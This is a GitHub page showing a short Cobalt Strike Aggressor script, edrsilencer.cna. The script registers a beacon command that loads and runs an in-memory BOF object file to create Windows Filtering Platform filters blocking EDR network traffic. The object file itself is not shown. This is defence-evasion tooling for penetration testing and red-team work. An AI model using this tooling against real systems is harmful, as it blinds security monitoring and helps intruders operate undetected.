-
Notifications
You must be signed in to change notification settings - Fork 2
/
edrsilencer.cna
47 lines (38 loc) · 1.5 KB
/
edrsilencer.cna
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
#############################################################################
# Copyright 2024 Aon plc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#############################################################################
alias edrsilencer {
local('$barch $handle $data $args $cmd $progpath');
if(size(@_) < 2)
{
berror($1, "usage: edrsilencer <blockedr/block/unblockall/unblock> [<program path>|<filter id>]");
return;
}
$cmd = $2;
$progpath = iff(-istrue $3, $3, "");
# figure out the arch of this session
$barch = barch($1);
# read in the right BOF file
$handle = openf(script_resource("edrsilencer. $+ $barch $+ .o"));
$data = readb($handle, -1);
closef($handle);
# pack our arguments
$args = bof_pack($1, "zz", $cmd, $progpath);
beacon_inline_execute($1, $data, "go", $args);
}
beacon_command_register(
"edrsilencer",
"Create WFP filter to block EDR network traffic",
"Synopsis: edrsilencer <blockedr/block/unblockall/unblock> [<program path>|filter id]\n");